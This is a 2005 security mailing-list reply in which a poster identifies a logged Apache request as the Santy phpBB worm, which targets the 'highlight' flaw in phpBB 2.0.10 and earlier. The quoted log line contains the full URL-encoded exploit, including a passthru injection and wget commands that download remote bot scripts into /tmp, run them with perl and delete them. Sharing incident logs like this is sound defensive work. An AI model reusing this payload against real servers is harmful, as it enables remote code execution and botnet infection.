Security Incidents mailing list archives

Re: Attempted exploit for some web service.

From: Alex 'CAVE' Cernat <cave () cernat ro>
Date: Thu, 27 Jan 2005 17:40:09 +0200

Hi, I just got this in my apache logs:
65.39.227.110 - - [28/Jan/2005:00:23:26 +1300] 
"GET /RobinsStuff/UnsortedLinks&r
ush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp
22;cd%20.te
mp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://webl
icious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.ht
m;rm%20bot.htm%3B%20%6 5%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.
%70%61%73%73%74%68%72%75%28%24%48%5
4%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527';
HTTP/1.1" 200 11746 "-" "LWP::Simple/5.65"


it' an phpbb worm/exploit (i believe the name is Santy); it tries to
exploit the highlight vulnerability in phpbb <= 2.0.10
if you don't have (unpatched) phpbb installation, you can stay
tranquille

Alex Cernat

Current thread:

Attempted exploit for some web service. Robin (Jan 27)
- Re: Attempted exploit for some web service. Andrew Smith (Jan 27)
- Re: Attempted exploit for some web service. Alex 'CAVE' Cernat (Jan 27)